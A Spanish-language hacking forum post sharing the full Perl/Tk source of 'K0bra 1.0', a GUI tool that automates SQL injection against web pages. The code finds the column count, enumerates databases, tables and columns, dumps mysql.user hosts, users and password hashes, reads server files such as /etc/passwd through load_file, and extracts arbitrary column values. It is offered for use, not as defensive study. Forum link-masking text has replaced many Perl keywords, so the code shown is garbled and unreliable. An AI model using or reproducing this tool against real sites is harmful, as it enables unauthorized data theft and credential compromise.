send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl Tk] K0bra 1.0

  • 0 Respuestas
  • 937 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:01:34 pm »
Hola a les dejo un programa para escanear la vulnerabilidad SQL de una forma
avanzada

Opciones

  • Scanea el numero de columnas
  • Busca el numero magico automaticamente y muestra data sobre la DB
  • Dumpea mysql.user
  • Lista bases de datos encontradas , asi como tablas y columnas
  • Permite visualizar archivos con load_file()
  • Codificacion y decodificacion para ascii y hex
  • Dumpea valores sobre cualquier columna
  • Guarda todo los registros en un archivo de texto con el nombre de la web



Imagenes







Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use LWP::UserAgent;
  7. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  8. use Win32;
  9.  
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  13. if ($^O eq 'MSWin32') {
  14. use Win32::Console;
  15. Win32::Console::Free();
  16. }
  17.  
  18. my $nave = LWP::UserAgent->new();
  19. $nave->timeout(5);
  20. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  21.  
  22. my $logo = MainWindow->new();
  23. $logo->title("k0bra 1.0 (C) Doddy Hackman 2011");
  24. $logo->geometry("500x510+20+20");
  25. $logo->resizable(0,0);
  26. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-You are not allowed to view links. Register or Login=>20);
  27. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=")->place(-You are not allowed to view links. Register or Login=>23,-x=>90);
  28. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start)->place(-You are not allowed to view links. Register or Login=>20,-x=>400);
  29. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-You are not allowed to view links. Register or Login=>70);
  30. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs)->place(-You are not allowed to view links. Register or Login=>110,-x=>40);
  31. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>120);
  32. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>200);
  33. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow)->place(-You are not allowed to view links. Register or Login=>110,-x=>280);
  34. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile)->place(-You are not allowed to view links. Register or Login=>110,-x=>390);
  35.  
  36. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum)->place(-You are not allowed to view links. Register or Login=>150,-x=>90);
  37. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1)->place(-You are not allowed to view links. Register or Login=>150,-x=>170);
  38. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2)->place(-You are not allowed to view links. Register or Login=>150,-x=>250);
  39. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china)->place(-You are not allowed to view links. Register or Login=>150,-x=>360);
  40.  
  41. $logo->Label(-text=>"Details : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>230,-x=>90);
  42.  
  43. my $informatero = $logo->Listbox(-height=>5,-width=>40)->place(-You are not allowed to view links. Register or Login=>210,-x=>160);
  44.  
  45. $logo->Label(-text=>"Databases",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>60);
  46. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>190);
  47. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>330);
  48.  
  49. my $datero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>40);
  50. my $tablero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>180);
  51. my $columnero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>320);
  52.  
  53. MainLoop;
  54.  
  55. sub start {
  56.  
  57. $informatero->You are not allowed to view links. Register or Login("0.0","end");
  58. $datero->You are not allowed to view links. Register or Login("0.0","end");
  59. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  60. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  61.  
  62. my $tengo = $targetero->get;
  63.  
  64. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($tengo,"--");
  65. if ($control eq 1) {
  66. $logo->update;
  67. $targetero->configure(-text=>$gen);
  68. details($gen,$bypass,$save);
  69. } else {
  70. Win32::MsgBox("Not found length columns",0,"K0bra 1.0");
  71. }
  72. }
  73.  
  74. sub You are not allowed to view links. Register or Login {
  75. my $rows  = "0";
  76. my $asc;
  77. my $page = $_[0];
  78. ($pass1,$pass2) = &bypass($_[1]);
  79. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  80. $code = toma($inyection);
  81. $logo->update;
  82.  
  83. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  84.  
  85. $logo->update;
  86.  
  87. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
  88. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
  89.  
  90. unless ($testar1 eq $testar2) {
  91. my $patha = $1;
  92. $logo->update;
  93. You are not allowed to view links. Register or Login $patha;
  94. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  95. $total = "1";
  96. for my $rows(2..200) {
  97. $logo->update;
  98. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  99. $total.= ",".$rows;
  100. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  101. $test = toma($injection);
  102. if ($test=~/RATSXPDOWN/) {
  103. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  104. $control = 1;
  105. my $save = comer($_[0]);
  106. savefile($save.".txt","\n[Target confirmed] : $page");
  107. savefile($save.".txt","[Bypass] : $_[1]\n");
  108. savefile($save.".txt","[Limit] : The site has $rows columns");
  109. savefile($save.".txt","[Data] : The number @number print data");
  110. $informatero->insert("end","[+] The site has $rows columns");
  111. $informatero->insert("end","[+] The number @number print data");
  112. if ($patha) {
  113. savefile($save.".txt","[Full Path Discloure] : $patha");
  114. }
  115. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  116. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  117. You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  118. }
  119. }
  120. }
  121. } else {
  122. Win32::MsgBox("Not vulnerable",0,"K0bra 1.0");
  123. next;
  124. }
  125. }
  126.  
  127. sub details {
  128. my ($page,$bypass,$save) = @_;
  129. ($pass1,$pass2) = &bypass($bypass);
  130. savefile($save.".txt","\n");
  131. if ($page=~/(.*)hackman(.*)/ig) {
  132. my  ($start,$end) = ($1,$2);
  133. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  134. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  135. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  136. $test1 = toma($inforschema);
  137. $test2 = toma($mysqluser);
  138. $informatero->insert("end","");
  139. if ($test2=~/ERTOR854/ig) {
  140. savefile($save.".txt","[mysql.user] : ON");
  141. $informatero->insert("end","[mysql.user] : ON");
  142. } else {
  143. $informatero->insert("end","[mysql.user] : OFF");
  144. savefile($save.".txt","[mysql.user] : OFF");
  145. }
  146. if ($test1=~/ERTOR854/ig) {
  147. $informatero->insert("end","[information_schema.tables] : ON");
  148. savefile($save.".txt","[information_schema.tables] : ON");
  149. } else {
  150. $informatero->insert("end","[information_schema.tables] : OFF");
  151. savefile($save.".txt","[information_schema.tables] : OFF");
  152. }
  153. if ($test3=~/ERTOR854/ig) {
  154. $informatero->insert("end","[load_file] : ON");
  155. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  156. }
  157. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  158. $injection = $start.$concat.$end.$pass2;
  159. $code = toma($injection);
  160. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  161. $informatero->insert("end","");
  162. $informatero->insert("end","[+] DB Version : $1");
  163. $informatero->insert("end","[+] DB Name : $2");
  164. $informatero->insert("end","[+] user_name : $3");
  165. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  166. } else {
  167. Win32::MsgBox("Not Found DB Info",0,"K0bra 1.0");
  168. }
  169. }
  170. }
  171.  
  172.  
  173. sub getdbs {
  174. $datero->You are not allowed to view links. Register or Login("0.0","end");
  175. my $page = $targetero->get;
  176. my $save = comer($page);
  177. my $page1 = $page;
  178. savefile($save.".txt","\n");
  179. ($pass1,$pass2) = &bypass($bypass);
  180. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  181. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  182. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  183. my $limita = $1;
  184. $logo->update;
  185. savefile($save.".txt","[+] Databases Length : $limita\n");
  186. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  187. $real = "1";
  188. for my $limit(0..$limita) {
  189. $logo->update;
  190. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  191. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  192. my $control = $1;
  193. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  194. $datero->insert("end",$control);
  195. savefile($save.".txt","[Database $real Found] : $control");
  196. $real++;
  197. }
  198. }
  199. }
  200. } else {
  201. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  202. }
  203. }
  204.  
  205.  
  206. sub schematablesdb {
  207.  
  208. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  209.  
  210. my $page = $targetero->get;
  211.  
  212. my $save = comer($page);
  213.  
  214. $d = $datero->curselection();
  215.  
  216. for my $id (@$d) {
  217. my $db = $datero->get($id);
  218.  
  219. my $page1 = $page;
  220. savefile($save.".txt","\n");
  221. ($pass1,$pass2) = &bypass($bypass);
  222. savefile($save.".txt","[DB] : $db");
  223. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  224. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  225. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  226. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  227. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  228. $logo->update;
  229. savefile($save.".txt","[+] Tables Length :  $1\n");
  230. my $limit = $1;
  231. $real = "1";
  232. for my $lim(0..$limit) {
  233. $logo->update;
  234. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  235. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  236. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  237. my $table = $1;
  238. You are not allowed to view links. Register or Login $table;
  239. savefile($save.".txt","[Table $real Found : $table ]");
  240. $tablero->insert("end",$db.".".$table);
  241. $real++;
  242. }}
  243. } else {
  244. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  245. }}}
  246.  
  247. sub schemacolumnsdb {
  248.  
  249. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  250.  
  251. my $page = $targetero->get;
  252. my $save = comer($page);
  253.  
  254. $d = $tablero->curselection();
  255.  
  256. for my $id (@$d) {
  257. my $da = $tablero->get($id);
  258.  
  259. if ($da=~/(.*)\.(.*)/) {
  260. my ($db,$table) = ($1,$2);
  261.  
  262. my $page3 = $page;
  263. my $page4 = $page;
  264.  
  265. savefile($save.".txt","\n");
  266. ($pass1,$pass2) = &bypass($bypass);
  267. savefile($save.".txt","\n[DB] : $db");
  268. savefile($save.".txt","[Table] : $table");
  269. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  270. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  271. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  272. savefile($save.".txt","[Columns length : $1 ]\n");
  273. my $si = $1;
  274. You are not allowed to view links. Register or Login $si;
  275. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  276. $real = "1";
  277. for my $limit2(0..$si) {
  278. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  279. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  280. $columnero->insert("end",$1);
  281. savefile($save.".txt","[Column $real] : $1");
  282. $real++;
  283. }
  284. }
  285. } else {
  286. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  287. }
  288. }
  289. }
  290. }
  291.  
  292. sub mynow {
  293.  
  294. my $p = $targetero->get;
  295.  
  296. $mi = MainWindow->new();
  297. $mi->title("Mysql Extractor");
  298. $mi->geometry("500x310+20+20");
  299. $mi->resizable(0,0);
  300.  
  301. $mi->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  302. my $guix = $mi->Entry(-width=>40,-text=>$p)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  303. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  304.  
  305. $mi->Label(-text=>"Host",-font=>"Impact1")->place(-x=>60,-You are not allowed to view links. Register or Login=>120);
  306. $mi->Label(-text=>"User",-font=>"Impact1")->place(-x=>200,-You are not allowed to view links. Register or Login=>120);
  307. $mi->Label(-text=>"Password",-font=>"Impact1")->place(-x=>360,-You are not allowed to view links. Register or Login=>120);
  308.  
  309. my $hostero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>40);
  310. my $usero = $mi->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>150,-x=>180);
  311. my $pasero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>340);
  312.  
  313.  
  314. sub tengorax {
  315.  
  316. my $page = $guix->get;
  317. my $save = comer($page);
  318.  
  319. my $cop = $page;
  320. my $cop1 = $page;
  321. savefile($save.".txt","\n");
  322.  
  323. ($pass1,$pass2) = &bypass($bypass);
  324. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  325. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  326. if ($code=~/RATSXPDOWN/ig){
  327. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  328. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  329. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  330. $mi->update;
  331. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  332. for my $limit(0..$1) {
  333. $mi->update;
  334. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  335. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  336. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  337. $mi->update;
  338. $hostero->insert("end",$1);
  339. $usero->insert("end",$2);
  340. $pasero->insert("end",$3);
  341. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  342. } else {
  343. last;
  344. }}}
  345. } else {
  346. Win32::MsgBox("mysql.user not found",0,"K0bra 1.0");
  347. }
  348. }
  349. }
  350.  
  351. sub myfile {
  352.  
  353. my $pag = $targetero->get;
  354.  
  355. $loa = MainWindow->new();
  356. $loa->title("load_file helper");
  357. $loa->geometry("380x400+20+20");
  358. $loa->resizable(0,0);
  359.  
  360. $loa->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  361. my $aa = $loa->Entry(-width=>40,-text=>$pag)->place(-You are not allowed to view links. Register or Login=>23,-x=>80);
  362. $loa->Label(-text=>"File : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>60,-x=>23);
  363. my $tea = $loa->Entry(-width=>20,-text=>"C:\leer.txt")->place(-You are not allowed to view links. Register or Login=>63,-x=>63);
  364. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno)->place(-You are not allowed to view links. Register or Login=>62,-x=>200);
  365. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena)->place(-You are not allowed to view links. Register or Login=>62,-x=>263);
  366.  
  367. $loa->Label(-text=>"Output",-font=>"Impact1")->place(-x=>160,-You are not allowed to view links. Register or Login=>130);
  368. my $mo = $loa->ROText(-width=>45,-height=>15)->place(-You are not allowed to view links. Register or Login=>170,-x=>25);
  369.  
  370. sub eno {
  371. my $t = $tea->get;
  372. if ($t=~/0x/) {
  373. $tea->configure(-text=>decode($t));
  374. } else {
  375. $tea->configure(-text=>encode($t));
  376. }
  377. }
  378.  
  379. sub ena {
  380.  
  381. $mo->You are not allowed to view links. Register or Login("0.0","end");
  382.  
  383. my $page = $aa->get;
  384. my $save = comer($page);
  385.  
  386. savefile($save.".txt","\n");
  387. ($pass1,$pass2) = &bypass($bypass);
  388. if ($page =~/(.*)hackman(.*)/g) {
  389. my $start = $1; my $end = $2;
  390. my $file = $tea->get;
  391. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  392. $code = toma($start.$concat.$end.$pass2);
  393. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  394. $mo->insert("end",$1);
  395. savefile($save.".txt","[File Found] : $file");
  396. savefile($save.".txt","\n[Source Start]\n");
  397. savefile($save.".txt","$1");
  398. savefile($save.".txt","\n[Source End]\n");
  399. } else {
  400. Win32::MsgBox("Error",0,"K0bra 1.0");
  401. }}}}
  402.  
  403. sub dum {
  404.  
  405. my $pa = $targetero->get;
  406.  
  407. $max = MainWindow->new();
  408. $max->title("Dump Values");
  409. $max->geometry("480x380+20+20");
  410. $max->resizable(0,0);
  411.  
  412. $max->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  413. my $tata = $max->Entry(-width=>40,-text=>$pa)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  414.  
  415. $max->Label(-text=>"Table : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>60);
  416. my $tato = $max->Entry(-width=>20)->place(-x=>105,-You are not allowed to view links. Register or Login=>63);
  417.  
  418. $max->Label(-text=>"Column1 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>90,-x=>50);
  419. my $tatu = $max->Entry(-width=>20)->place(-x=>130,-You are not allowed to view links. Register or Login=>93);
  420.  
  421. $max->Label(-text=>"Column2 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>130,-x=>50);
  422. my $tita= $max->Entry(-width=>20)->place(-You are not allowed to view links. Register or Login=>133,-x=>130);
  423.  
  424.  
  425. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  426.  
  427. $max->Label(-text=>"Column1",-font=>"Impact1")->place(-x=>100,-You are not allowed to view links. Register or Login=>180);
  428. $max->Label(-text=>"Column2",-font=>"Impact1")->place(-x=>300,-You are not allowed to view links. Register or Login=>180);
  429.  
  430. my $duta1 = $max->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>210,-x=>70);
  431. my $duta2 = $max->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>210,-x=>260);
  432.  
  433.  
  434. sub tengor {
  435.  
  436. $duta1->You are not allowed to view links. Register or Login("0.0","end");
  437. $duta2->You are not allowed to view links. Register or Login("0.0","end");
  438.  
  439. my $page = $tata->get;
  440. my $tabla = $tato->get;
  441. my $col1 = $tatu->get;
  442. my $col2 = $tita->get;
  443.  
  444. my $save = comer($page);
  445.  
  446. savefile($save.".txt","\n");
  447.  
  448. ($pass1,$pass2) = &bypass($bypass);
  449. if ($page=~/(.*)hackman(.*)/){
  450. my $start = $1;
  451. my $end = $2;
  452. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  453. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  454. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  455. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  456. $tota = $1;
  457. savefile($save.".txt","[Table] : $tabla");
  458. savefile($save.".txt","[+] Length of the rows: $tota\n");
  459. savefile($save.".txt","[$col1] [$col2]\n");
  460. for my $limit(0..$tota) {
  461. You are not allowed to view links. Register or Login $limit;
  462. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  463. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  464. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  465. $duta1->insert("end",$1);
  466. $duta2->insert("end",$2);
  467. } else {
  468. last;
  469. }}
  470. } else {
  471. Win32::MsgBox("Error",0,"K0bra 1.0");
  472. }}}}
  473.  
  474. sub per1 {
  475.  
  476. my $he = MainWindow->new();
  477. $he->title("Hex Converter (C) Doddy Hackman 2011");
  478. $he->geometry("420x70+20+20");
  479. $he->resizable(0,0);
  480. $he->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  481. my $cam = $he->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  482. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  483. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  484.  
  485. sub paso1 {
  486.  
  487. my $caca = $cam->get();
  488. You are not allowed to view links. Register or Login $caca;
  489.  
  490. $cam->configure(-text=>encode($caca));
  491.  
  492. }
  493.  
  494. sub paso2 {
  495.  
  496. my $caca = $cam->get();
  497. You are not allowed to view links. Register or Login $caca;
  498.  
  499. $cam->configure(-text=>decode($caca));
  500.  
  501. }
  502. }
  503.  
  504.  
  505. sub per2 {
  506.  
  507. my $hexae = MainWindow->new();
  508. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  509. $hexae->geometry("420x70+20+20");
  510. $hexae->resizable(0,0);
  511. $hexae->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  512. my $cama = $hexae->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  513. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  514. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  515.  
  516.  
  517. sub paso3 {
  518.  
  519. my $caca = $cama->get();
  520. You are not allowed to view links. Register or Login $caca;
  521.  
  522. $cama->configure(-text=>ascii($caca));
  523.  
  524. }
  525.  
  526. sub paso4 {
  527.  
  528. my $caca = $cama->get();
  529. You are not allowed to view links. Register or Login $caca;
  530.  
  531. $cama->configure(-text=>ascii_de($caca));
  532.  
  533. }
  534.  
  535. }
  536.  
  537. sub china {
  538. my $de = $targetero->get;
  539. my $save = comer($de);
  540. my $file = $save.".txt";
  541. You are not allowed to view links. Register or Login("start logs/webs/$file");
  542. }
  543.  
  544. sub bypass {
  545. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  546. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  547. else {You are not allowed to view links. Register or Login ("+","--");}}
  548.  
  549. sub ascii {
  550. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  551. }
  552.  
  553. sub ascii_de {
  554. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  555. You are not allowed to view links. Register or Login $_[0];
  556. }
  557.  
  558.  
  559. sub encode {
  560. my $string = $_[0];
  561. $hex = '0x';
  562. for (You are not allowed to view links. Register or Login //,$string) {
  563. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  564. }
  565. You are not allowed to view links. Register or Login $hex;
  566. }
  567.  
  568. sub decode {
  569. $_[0] =~ s/^0x//;
  570. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  571. You are not allowed to view links. Register or Login $encode;
  572. }
  573.  
  574.  
  575. sub toma {
  576. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  577. }
  578.  
  579. sub savefile {
  580. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  581. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  582. You are not allowed to view links. Register or Login SAVE;
  583. }
  584.  
  585. sub comer {
  586. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  587. You are not allowed to view links. Register or Login $auth;
  588. }
  589.  
  590. # ¿ The End ?
  591.  
« Última modificación: Julio 17, 2011, 03:43:04 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2854
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1325
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1079
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1266
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 970
Último mensaje Noviembre 12, 2012, 07:31:50 pm
